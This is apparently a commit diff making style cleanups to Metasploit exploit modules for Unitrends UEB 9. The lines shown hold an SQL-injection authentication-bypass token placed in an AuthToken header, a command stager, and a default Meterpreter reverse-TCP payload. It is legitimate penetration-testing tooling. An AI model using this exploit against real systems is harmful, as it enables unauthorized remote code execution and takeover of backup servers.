ueb9 style cleanup
parent
c26779ef54
commit
5abdfe3e59
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
|
@ -41,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'UEB 9.*', { } ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{ 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
|
||||
'SSL' => true
|
||||
},
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
|
||||
'SSL' => true
|
||||
},
|
||||
'DisclosureDate' => 'Aug 8 2017',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
|
@ -62,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
||||
session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass
|
||||
session = Base64.strict_encode64(session) #b64 encode session token
|
||||
|
||||
|
@ -79,19 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'encode_params' => false,
|
||||
'data' => parms,
|
||||
'headers' =>
|
||||
{'AuthToken' => session,}
|
||||
{'AuthToken' => session}
|
||||
})
|
||||
|
||||
if res &&res.code != 500
|
||||
if res && res.code != 500
|
||||
fail_with(Failure::UnexpectedReply,'Unexpected response')
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - pwn'ng ueb 9....")
|
||||
execute_cmdstager(:linemax => 120)
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -38,15 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'UEB 9.*', { } ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{ 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
|
||||
'SSL' => false
|
||||
},
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
|
||||
'SSL' => false
|
||||
},
|
||||
'DisclosureDate' => 'Aug 8 2017',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1743),
|
||||
register_options([
|
||||
Opt::RPORT(1743)
|
||||
])
|
||||
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue